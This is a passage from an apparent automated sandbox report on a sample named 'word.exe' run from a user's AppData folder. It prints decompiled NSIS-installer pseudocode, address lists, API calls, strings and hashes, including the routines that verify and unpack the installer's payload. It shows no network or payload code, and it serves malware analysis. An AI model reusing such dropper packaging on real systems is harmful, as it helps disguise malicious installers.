							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)), 0);
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x4236f8, 0x40f, 0, 1);
						__eflags =  *0x4236ec;
						return 0 |  *0x4236ec == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420508, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420508,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403F5C(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x4236f8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423fac - _t133;
										if( *0x423fac == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f8f8 = 1;
											L21:
											_push(0x78);
											L22:
											E00403ECE();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f8f8 = _t127;
										goto L21;
									}
									__eflags =  *0x409238 - _t133; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x4236f8);
						 *0x4236f8 = _a12;
						L58:
						_t141 =  *0x421530 - _t133; // 0x0
						if(_t141 == 0 &&  *0x4236f8 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x421530 = 1;
						}
						L61:
						return 0;
					}
				}
			}































                                                          0x00403a2b
                                                          0x00403a34
                                                          0x00403b75
                                                          0x00403b79
                                                          0x00403b7d
                                                          0x00403b7f
                                                          0x00403b84
                                                          0x00403b8f
                                                          0x00403b9a
                                                          0x00403b9f
                                                          0x00403ba1
                                                          0x00403ba3
                                                          0x00403ba6
                                                          0x00403bab
                                                          0x00403bb9
                                                          0x00403bc6
                                                          0x00403bcd
                                                          0x00403bcd
                                                          0x00403bce
                                                          0x00403bce
                                                          0x00403bd3
                                                          0x00403bd9
                                                          0x00403be0
                                                          0x00403be6
                                                          0x00403be8
                                                          0x00403c28
                                                          0x00403c2d
                                                          0x00403c32
                                                          0x00403c32
                                                          0x00403c37
                                                          0x00403c40
                                                          0x00403c42
                                                          0x00403c47
                                                          0x00403c4d
                                                          0x00403c51
                                                          0x00403c51
                                                          0x00403c56
                                                          0x00403c5c
                                                          0x00000000
                                                          0x00000000
                                                          0x00403c67
                                                          0x00403c6d
                                                          0x00000000
                                                          0x00000000
                                                          0x00403c73
                                                          0x00403c76
                                                          0x00403c79
                                                          0x00403c7e
                                                          0x00403c83
                                                          0x00403c86
                                                          0x00403c8c
                                                          0x00403c91
                                                          0x00403c94
                                                          0x00403c9a
                                                          0x00403c9f
                                                          0x00403ca2
                                                          0x00403ca8
                                                          0x00403cb0
                                                          0x00403cb6
                                                          0x00403cbc
                                                          0x00403cc0
                                                          0x00403cc7
                                                          0x00403cc7
                                                          0x00403cc7
                                                          0x00403cd1
                                                          0x00403ce3
                                                          0x00403cef
                                                          0x00403cf4
                                                          0x00403cfe
                                                          0x00403d04
                                                          0x00403d06
                                                          0x00403d0b
                                                          0x00403d08
                                                          0x00403d08
                                                          0x00403d08
                                                          0x00403d1b
                                                          0x00403d33
                                                          0x00403d35
                                                          0x00403d3b
                                                          0x00403d50
                                                          0x00403d3d
                                                          0x00403d46
                                                          0x00403d48
                                                          0x00403d48
                                                          0x00403d56
                                                          0x00403d66
                                                          0x00403d6b
                                                          0x00403d76
                                                          0x00403d77
                                                          0x00403d7e
                                                          0x00403d88
                                                          0x00403d8d
                                                          0x00403d8f
                                                          0x00000000
                                                          0x00403d95
                                                          0x00403d95
                                                          0x00403d97
                                                          0x00000000
                                                          0x00000000
                                                          0x00403d9d
                                                          0x00403da1
                                                          0x00403dc6
                                                          0x00403dcc
                                                          0x00403dd2
                                                          0x00403dd4
                                                          0x00000000
                                                          0x00000000
                                                          0x00403dfa
                                                          0x00403e00
                                                          0x00403e02
                                                          0x00403e07
                                                          0x00000000
                                                          0x00000000
                                                          0x00403e0d
                                                          0x00403e10
                                                          0x00403e13
                                                          0x00403e2a
                                                          0x00403e36
                                                          0x00403e4f
                                                          0x00403e59
                                                          0x00403e5e
                                                          0x00403e64
                                                          0x00000000
                                                          0x00000000
                                                          0x00403e6e
                                                          0x00403e79
                                                          0x00000000
                                                          0x00403e79
                                                          0x00403da3
                                                          0x00403da9
                                                          0x00000000
                                                          0x00000000
                                                          0x00403daf
                                                          0x00403db5
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403dbb
                                                          0x00403d8f
                                                          0x00403e86
                                                          0x00403e92
                                                          0x00403e99
                                                          0x00000000
                                                          0x00403bea
                                                          0x00403bea
                                                          0x00403bed
                                                          0x00403c20
                                                          0x00403c20
                                                          0x00403c22
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403c22
                                                          0x00403bf3
                                                          0x00403bf8
                                                          0x00403bfa
                                                          0x00000000
                                                          0x00000000
                                                          0x00403c0a
                                                          0x00403c12
                                                          0x00000000
                                                          0x00403c18
                                                          0x00403a46
                                                          0x00403a46
                                                          0x00403a4a
                                                          0x00403a4f
                                                          0x00403a5e
                                                          0x00403a5e
                                                          0x00403a67
                                                          0x00403a70
                                                          0x00403a7b
                                                          0x00403a7b
                                                          0x00403a87
                                                          0x00403aa3
                                                          0x00403aa6
                                                          0x00403ab9
                                                          0x00403abf
                                                          0x00403b62
                                                          0x00000000
                                                          0x00403b6b
                                                          0x00403ac5
                                                          0x00403ad2
                                                          0x00403ad4
                                                          0x00403ad6
                                                          0x00403af5
                                                          0x00403af5
                                                          0x00403af8
                                                          0x00403afd
                                                          0x00403b00
                                                          0x00403b10
                                                          0x00403b11
                                                          0x00403b13
                                                          0x00403b49
                                                          0x00403b5c
                                                          0x00000000
                                                          0x00403b5c
                                                          0x00403b15
                                                          0x00403b1b
                                                          0x00403b34
                                                          0x00403b39
                                                          0x00403b3b
                                                          0x00000000
                                                          0x00000000
                                                          0x00403b3d
                                                          0x00403b29
                                                          0x00403b29
                                                          0x00403b2b
                                                          0x00403b2b
                                                          0x00000000
                                                          0x00403b2b
                                                          0x00403b1e
                                                          0x00403b23
                                                          0x00000000
                                                          0x00403b23
                                                          0x00403b02
                                                          0x00403b08
                                                          0x00000000
                                                          0x00000000
                                                          0x00403b0a
                                                          0x00000000
                                                          0x00403b0a
                                                          0x00403afa
                                                          0x00000000
                                                          0x00403afa
                                                          0x00403ae0
                                                          0x00403ae7
                                                          0x00403aed
                                                          0x00403aef
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403aef
                                                          0x00403aab
                                                          0x00000000
                                                          0x00403a89
                                                          0x00403a8f
                                                          0x00403a99
                                                          0x00403e9f
                                                          0x00403e9f
                                                          0x00403ea5
                                                          0x00403eb2
                                                          0x00403eb8
                                                          0x00403eb8
                                                          0x00403ec2
                                                          0x00000000
                                                          0x00403ec2
                                                          0x00403a87

                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A5E
                                                          • ShowWindow.USER32(?), ref: 00403A7B
                                                          • DestroyWindow.USER32 ref: 00403A8F
                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403AAB
                                                          • GetDlgItem.USER32(?,?), ref: 00403ACC
                                                          • SendMessageA.USER32 ref: 00403AE0
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403AE7
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403B95
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403B9F
                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403BB9
                                                          • SendMessageA.USER32 ref: 00403C0A
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403CB0
                                                          • ShowWindow.USER32(00000000,?), ref: 00403CD1
                                                          • EnableWindow.USER32(?,?), ref: 00403CE3
                                                          • EnableWindow.USER32(?,?), ref: 00403CFE
                                                          • GetSystemMenu.USER32 ref: 00403D14
                                                          • EnableMenuItem.USER32 ref: 00403D1B
                                                          • SendMessageA.USER32 ref: 00403D33
                                                          • SendMessageA.USER32 ref: 00403D46
                                                          • lstrlenA.KERNEL32(00420530,?,00420530,00423720), ref: 00403D6F
                                                          • SetWindowTextA.USER32(?,00420530), ref: 00403D7E
                                                          • ShowWindow.USER32(?,0000000A), ref: 00403EB2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID:
                                                          • API String ID: 184305955-0
                                                          • Opcode ID: 1ea3c2a88b1d1f312b806789cbcc4bcb404401e61963c7eaf7926aa73dfb699e
                                                          • Instruction ID: a83dcc86622e640bdf6b153063aa13b6230d1eae5258657c65e28bef3e163658
                                                          • Opcode Fuzzy Hash: 1ea3c2a88b1d1f312b806789cbcc4bcb404401e61963c7eaf7926aa73dfb699e
                                                          • Instruction Fuzzy Hash: E8C1D171A04205BBDB21AF21ED45D2B7EBCEB44706F50053EF601B12F1C779AA829B1E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402C7D Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 218memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 276 402c7d-402ccc GetTickCount GetModuleFileNameA call 4057cb 279 402cd8-402d06 call 405af4 call 40562e call 405af4 GetFileSize 276->279 280 402cce-402cd3 276->280 288 402e45-402e4b 279->288 289 402d0c-402d23 279->289 281 402f6a-402f6e 280->281 290 402e51-402e54 288->290 291 402f22-402f27 288->291 292 402d25 289->292 293 402d27-402d2d call 40327d 289->293 294 402e80-402ecc GlobalAlloc call 405eb4 call 4057fa CreateFileA 290->294 295 402e56-402e6e call 4032af call 40327d 290->295 291->281 292->293 298 402d32-402d34 293->298 320 402ee8-402f18 call 4032af call 402f71 294->320 321 402ece-402ed3 294->321 295->291 316 402e74-402e7a 295->316 301 402ed8-402edb 298->301 302 402d3a-402d40 298->302 301->291 308 402edd-402ee6 DestroyWindow 301->308 305 402dd4-402dd8 302->305 306 402d46-402d5e call 40578c 302->306 309 402dda-402ddd 305->309 310 402e0e-402e14 305->310 306->310 325 402d64-402d6b 306->325 308->291 314 402de7-402df0 GetTickCount 309->314 315 402ddf-402de5 call 405e13 309->315 318 402e16-402e24 call 405e46 310->318 319 402e27-402e31 310->319 314->310 324 402df2-402e0b CreateDialogParamA 314->324 315->310 316->291 316->294 318->319 319->289 327 402e37-402e3a 319->327 335 402f1d-402f20 320->335 321->281 324->310 325->310 330 402d71-402d78 325->330 327->288 332 402e3c-402e3f DestroyWindow 327->332 330->310 334 402d7e-402d85 330->334 332->288 334->310 336 402d8b-402d92 334->336 335->291 337 402f29-402f3a 335->337 336->310 338 402d94-402db4 336->338 339 402f42-402f47 337->339 340 402f3c 337->340 338->291 341 402dba-402dbe 338->341 342 402f48-402f4e 339->342 340->339 343 402dc0-402dc4 341->343 344 402dc6-402dce 341->344 342->342 346 402f50-402f68 call 40578c 342->346 343->327 343->344 344->310 345 402dd0-402dd2 344->345 345->310 346->281
                                                          C-Code - Quality: 96%
                                                          			E00402C7D(void* __eflags, signed int _a4) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct HWND__* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				char _v308;
				long _t63;
				void* _t65;
				void* _t70;
				intOrPtr _t73;
				void* _t76;
				intOrPtr* _t78;
				intOrPtr _t79;
				long _t90;
				void* _t91;
				signed int _t100;
				intOrPtr _t103;
				void* _t111;
				signed int _t112;
				void* _t113;
				long _t114;
				long _t117;
				void* _t118;

				_v8 = 0;
				_v20 = GetTickCount() + 0x3e8;
				_v12 = 0;
				_v16 = 0;
				GetModuleFileNameA(0, "C:\\Users\\Albus\\AppData\\Roaming\\word.exe", 0x400);
				_t113 = E004057CB("C:\\Users\\Albus\\AppData\\Roaming\\word.exe", 0x80000000, 3);
				 *0x409020 = _t113;
				if(_t113 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405AF4("C:\\Users\\Albus\\AppData\\Roaming", "C:\\Users\\Albus\\AppData\\Roaming\\word.exe");
				E00405AF4(0x42b000, E0040562E("C:\\Users\\Albus\\AppData\\Roaming"));
				_t63 = GetFileSize(_t113, 0);
				 *0x41f0e0 = _t63;
				_t117 = _t63;
				if(_t63 <= 0) {
					L27:
					if( *0x423f2c == 0) {
						goto L36;
					}
					if(_v16 == 0) {
						L31:
						_t65 = GlobalAlloc(0x40, _v28); // executed
						_t118 = _t65;
						E00405EB4(0x40b008);
						E004057FA( &_v308, "C:\\Users\\Albus\\AppData\\Local\\Temp\\"); // executed
						_t70 = CreateFileA( &_v308, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
						 *0x409024 = _t70;
						if(_t70 != 0xffffffff) {
							_t73 = E004032AF( *0x423f2c + 0x1c);
							 *0x41f0e4 = _t73;
							 *0x4170d8 = _t73 - ( !_v48 & 0x00000004) + _v24 - 0x1c; // executed
							_t76 = E00402F71(_v24, 0xffffffff, 0, _t118, _v28); // executed
							if(_t76 == _v28) {
								 *0x423f28 = _t118;
								 *0x423f30 =  *_t118;
								if((_v48 & 0x00000001) != 0) {
									 *0x423f34 =  *0x423f34 + 1;
								}
								_t54 = _t118 + 0x44; // 0x44
								_t78 = _t54;
								_t111 = 8;
								do {
									_t78 = _t78 - 8;
									 *_t78 =  *_t78 + _t118;
									_t111 = _t111 - 1;
								} while (_t111 != 0);
								_t79 =  *0x4170d4; // 0x5fc39
								 *((intOrPtr*)(_t118 + 0x3c)) = _t79;
								E0040578C(0x423f40, _t118 + 4, 0x40);
								return 0;
							}
							goto L36;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004032AF( *0x4170d0);
					if(E0040327D( &_a4, 4) == 0 || _v12 != _a4) {
						goto L36;
					} else {
						goto L31;
					}
				} else {
					do {
						_t114 = _t117;
						asm("sbb eax, eax");
						_t90 = ( ~( *0x423f2c) & 0x00007e00) + 0x200;
						if(_t117 >= _t90) {
							_t114 = _t90;
						}
						_t91 = E0040327D(0x4170e0, _t114); // executed
						if(_t91 == 0) {
							if(_v8 != 0) {
								DestroyWindow(_v8);
							}
							L36:
							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
						}
						if( *0x423f2c != 0) {
							if((_a4 & 0x00000002) == 0) {
								if(_v8 == 0) {
									if(GetTickCount() > _v20) {
										_v8 = CreateDialogParamA( *0x423f20, 0x6f, 0, E00402BCA, "verifying installer: %d%%");
									}
								} else {
									E00405E13(0);
								}
							}
							goto L22;
						}
						E0040578C( &_v48, 0x4170e0, 0x1c);
						_t100 = _v48;
						if((_t100 & 0xfffffff0) == 0 && _v44 == 0xdeadbeef && _v32 == 0x74736e49 && _v36 == 0x74666f73 && _v40 == 0x6c6c754e) {
							_a4 = _a4 | _t100;
							_t112 =  *0x4170d0; // 0x0
							 *0x423fc0 =  *0x423fc0 | _a4 & 0x00000002;
							_t103 = _v24;
							 *0x423f2c = _t112;
							if(_t103 > _t117) {
								goto L36;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v16 = _v16 + 1;
								_t25 = _t103 - 4; // 0x1c
								_t117 = _t25;
								if(_t114 > _t117) {
									_t114 = _t117;
								}
								goto L22;
							} else {
								break;
							}
						}
						L22:
						if(_t117 <  *0x41f0e0) {
							_v12 = E00405E46(_v12, 0x4170e0, _t114);
						}
						 *0x4170d0 =  *0x4170d0 + _t114;
						_t117 = _t117 - _t114;
					} while (_t117 > 0);
					if(_v8 != 0) {
						DestroyWindow(_v8);
					}
					goto L27;
				}
			}
































                                                          0x00402c8b
                                                          0x00402ca5
                                                          0x00402ca8
                                                          0x00402cab
                                                          0x00402cae
                                                          0x00402cc1
                                                          0x00402cc6
                                                          0x00402ccc
                                                          0x00000000
                                                          0x00402cce
                                                          0x00402cdf
                                                          0x00402cf0
                                                          0x00402cf7
                                                          0x00402cff
                                                          0x00402d04
                                                          0x00402d06
                                                          0x00402e45
                                                          0x00402e4b
                                                          0x00000000
                                                          0x00000000
                                                          0x00402e54
                                                          0x00402e80
                                                          0x00402e85
                                                          0x00402e90
                                                          0x00402e92
                                                          0x00402ea3
                                                          0x00402ebe
                                                          0x00402ec7
                                                          0x00402ecc
                                                          0x00402ef1
                                                          0x00402f01
                                                          0x00402f13
                                                          0x00402f18
                                                          0x00402f20
                                                          0x00402f2d
                                                          0x00402f35
                                                          0x00402f3a
                                                          0x00402f3c
                                                          0x00402f3c
                                                          0x00402f44
                                                          0x00402f44
                                                          0x00402f47
                                                          0x00402f48
                                                          0x00402f48
                                                          0x00402f4b
                                                          0x00402f4d
                                                          0x00402f4d
                                                          0x00402f50
                                                          0x00402f57
                                                          0x00402f63
                                                          0x00000000
                                                          0x00402f68
                                                          0x00000000
                                                          0x00402f20
                                                          0x00000000
                                                          0x00402ece
                                                          0x00402e5c
                                                          0x00402e6e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402d0c
                                                          0x00402d0c
                                                          0x00402d11
                                                          0x00402d15
                                                          0x00402d1c
                                                          0x00402d23
                                                          0x00402d25
                                                          0x00402d25
                                                          0x00402d2d
                                                          0x00402d34
                                                          0x00402edb
                                                          0x00402ee0
                                                          0x00402ee0
                                                          0x00402f22
                                                          0x00000000
                                                          0x00402f22
                                                          0x00402d40
                                                          0x00402dd8
                                                          0x00402ddd
                                                          0x00402df0
                                                          0x00402e0b
                                                          0x00402e0b
                                                          0x00402ddf
                                                          0x00402de0
                                                          0x00402de0
                                                          0x00402ddd
                                                          0x00000000
                                                          0x00402dd8
                                                          0x00402d51
                                                          0x00402d56
                                                          0x00402d5e
                                                          0x00402d94
                                                          0x00402d9a
                                                          0x00402da3
                                                          0x00402da9
                                                          0x00402dae
                                                          0x00402db4
                                                          0x00000000
                                                          0x00000000
                                                          0x00402dbe
                                                          0x00402dc6
                                                          0x00402dc9
                                                          0x00402dc9
                                                          0x00402dce
                                                          0x00402dd0
                                                          0x00402dd0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402dbe
                                                          0x00402e0e
                                                          0x00402e14
                                                          0x00402e24
                                                          0x00402e24
                                                          0x00402e27
                                                          0x00402e2d
                                                          0x00402e2f
                                                          0x00402e3a
                                                          0x00402e3f
                                                          0x00402e3f
                                                          0x00000000
                                                          0x00402e3a

                                                          APIs
                                                          • GetTickCount.KERNEL32(C:\Users\user\AppData\Roaming\word.exe,00000000,00000000), ref: 00402C8E
                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\word.exe,00000400), ref: 00402CAE
                                                            • Part of subcall function 004057CB: GetFileAttributesA.KERNELBASE(00000003,00402CC1,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 004057CF
                                                            • Part of subcall function 004057CB: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004057F1
                                                          • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\word.exe,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00402CF7
                                                          • DestroyWindow.USER32 ref: 00402E3F
                                                          • GlobalAlloc.KERNELBASE(00000040,?), ref: 00402E85
                                                          Strings
                                                          • Error launching installer, xrefs: 00402CCE
                                                          • The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t, xrefs: 00402F22
                                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402ECE
                                                          • verifying installer: %d%%, xrefs: 00402DF2
                                                          • Null, xrefs: 00402D8B
                                                          • C:\Users\user\AppData\Roaming\word.exe, xrefs: 00402C94, 00402CA3, 00402CBB, 00402CD8
                                                          • Inst, xrefs: 00402D71
                                                          • C:\Users\user\AppData\Roaming\word.exe, xrefs: 00402C8A
                                                          • soft, xrefs: 00402D7E
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C7D, 00402E9D
                                                          • C:\Users\user\AppData\Roaming, xrefs: 00402CD9, 00402CDE, 00402CE4
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateDestroyGlobalModuleNameSizeTickWindow
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\word.exe$C:\Users\user\AppData\Roaming\word.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Null$The installer you are trying to use is corrupted or incomplete.This could be the result of a damaged disk, a failed download or a virus.You may want to contact the author of this installer to obtain a new copy.It may be possible to skip this check using t$soft$verifying installer: %d%%
                                                          • API String ID: 2181728824-2095694560
                                                          • Opcode ID: fa3c77b8c9c104c16c323750b5209556a5f99b4d0684dab4212019c86abb6d92
                                                          • Instruction ID: db3d77af3dcc15e42867082d874dfbf8a96a36a76704b09f65ca819f11d0ff47
                                                          • Opcode Fuzzy Hash: fa3c77b8c9c104c16c323750b5209556a5f99b4d0684dab4212019c86abb6d92
                                                          • Instruction Fuzzy Hash: DB81B031E40205ABDB20DFA4DE89A9E7AB4EB08355F14813BF505B62D1C7BC9E41CB9C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040309C Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 137filewindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 415 40309c-4030c8 GetTickCount 416 403272 415->416 417 4030ce-4030f3 call 4032af SetFilePointer 415->417 418 403274-40327a 416->418 421 4030f9-40310b 417->421 422 40310d 421->422 423 40310f-40311d call 40327d 421->423 422->423 426 403123-40312f 423->426 427 40323d-403240 423->427 428 403135-40313b 426->428 427->418 429 4031a0-4031c0 call 405ed4 428->429 430 40313d-403143 428->430 436 403246 429->436 437 4031c6-4031d3 429->437 430->429 431 403145-403149 430->431 433 40314b-40316b call 405e13 431->433 434 40316d-403175 GetTickCount 431->434 433->429 434->429 439 403177-40319c CreateDialogParamA 434->439 443 403248-403249 436->443 440 4031d5-4031eb WriteFile 437->440 441 403207-40320d 437->441 439->429 444 403242-403244 440->444 445 4031ed-4031f1 440->445 441->436 446 40320f-403211 441->446 443->418 444->443 445->444 447 4031f3-4031ff 445->447 446->436 448 403213-403226 446->448 447->428 449 403205 447->449 448->421 450 40322c-403251 SetFilePointer 448->450 449->448 450->416 452 403253-40326c SendMessageA DestroyWindow 450->452 452->416
                                                          C-Code - Quality: 93%
                                                          			E0040309C(intOrPtr _a4) {
				long _v4;
				struct _OVERLAPPED* _v8;
				struct HWND__* _v12;
				void* __ecx;
				long _t10;
				intOrPtr _t14;
				long _t15;
				signed int _t16;
				void* _t18;
				void* _t19;
				long _t21;
				int _t26;
				long _t27;
				long _t31;
				long _t38;
				void* _t45;
				long _t46;
				intOrPtr _t48;
				void* _t50;
				long _t51;
				struct HWND__* _t52;
				long _t65;

				_v8 = 0;
				_t10 = GetTickCount();
				_t46 =  *0x4170d4; // 0x5fc39
				_t45 = _t10 + 0x1f4;
				_t48 = _t46 -  *0x40b004 + _a4;
				if(_t48 <= 0) {
					L28:
					return 0;
				} else {
					E004032AF( *0x41f0e4);
					SetFilePointer( *0x409024,  *0x40b004, 0, 0);
					 *0x41f0e0 = _t48;
					 *0x4170d0 = 0;
					while(1) {
						_t14 =  *0x4170d8; // 0x49069
						_t38 = 0x4000;
						_t15 = _t14 -  *0x41f0e4;
						if(_t15 <= 0x4000) {
							_t38 = _t15;
						}
						_t16 = E0040327D(0x413090, _t38); // executed
						if(_t16 == 0) {
							break;
						}
						 *0x41f0e4 =  *0x41f0e4 + _t38;
						 *0x40b020 = 0x413090;
						 *0x40b024 = _t38;
						L6:
						L6:
						if( *0x423f28 != 0 &&  *0x423fc0 == 0) {
							if(_v8 == 0) {
								_t27 = GetTickCount();
								__eflags = _t27 - _t45;
								if(_t27 > _t45) {
									asm("sbb eax, eax");
									_t31 =  !( ~( *0x423f24)) & "unpacking data: %d%%";
									__eflags = _t31;
									_v12 = CreateDialogParamA( *0x423f20, 0x6f, 0, E00402BCA, _t31);
								}
							} else {
								 *0x4170d0 =  *0x41f0e0 -  *0x4170d4 - _a4 +  *0x40b004;
								E00405E13(0);
							}
						}
						 *0x40b028 = 0x40b090;
						 *0x40b02c = 0x8000; // executed
						_t18 = E00405ED4(0x40b008); // executed
						if(_t18 < 0) {
							goto L24;
						}
						_t50 =  *0x40b028; // 0x40cb56
						_t51 = _t50 - 0x40b090;
						if(_t51 == 0) {
							__eflags =  *0x40b024; // 0x0
							if(__eflags != 0) {
								goto L24;
							}
							__eflags = _t38;
							if(_t38 == 0) {
								goto L24;
							}
							L20:
							_t21 =  *0x4170d4; // 0x5fc39
							if(_t21 -  *0x40b004 + _a4 > 0) {
								continue;
							}
							SetFilePointer( *0x409024, _t21, 0, 0);
							_t52 = _v8;
							if(_t52 != 0) {
								 *0x4170d0 =  *0x41f0e0;
								SendMessageA(_t52, 0x113, 0, 0);
								DestroyWindow(_t52);
							}
							goto L28;
						}
						_t26 = WriteFile( *0x409024, 0x40b090, _t51,  &_v4, 0); // executed
						if(_t26 == 0 || _t51 != _v4) {
							_push(0xfffffffe);
							L25:
							_pop(_t19);
							return _t19;
						} else {
							 *0x40b004 =  *0x40b004 + _t51;
							_t65 =  *0x40b024; // 0x0
							if(_t65 != 0) {
								goto L6;
							}
							goto L20;
						}
						L24:
						_push(0xfffffffd);
						goto L25;
					}
					return _t16 | 0xffffffff;
				}
			}

























                                                          0x004030a4
                                                          0x004030a8
                                                          0x004030ae
                                                          0x004030bc
                                                          0x004030c2
                                                          0x004030c8
                                                          0x00403272
                                                          0x00000000
                                                          0x004030ce
                                                          0x004030d4
                                                          0x004030e7
                                                          0x004030ed
                                                          0x004030f3
                                                          0x004030f9
                                                          0x004030f9
                                                          0x004030fe
                                                          0x00403103
                                                          0x0040310b
                                                          0x0040310d
                                                          0x0040310d
                                                          0x00403116
                                                          0x0040311d
                                                          0x00000000
                                                          0x00000000
                                                          0x00403123
                                                          0x00403129
                                                          0x0040312f
                                                          0x00000000
                                                          0x00403135
                                                          0x0040313b
                                                          0x00403149
                                                          0x0040316d
                                                          0x00403173
                                                          0x00403175
                                                          0x0040317e
                                                          0x00403182
                                                          0x00403182
                                                          0x0040319c
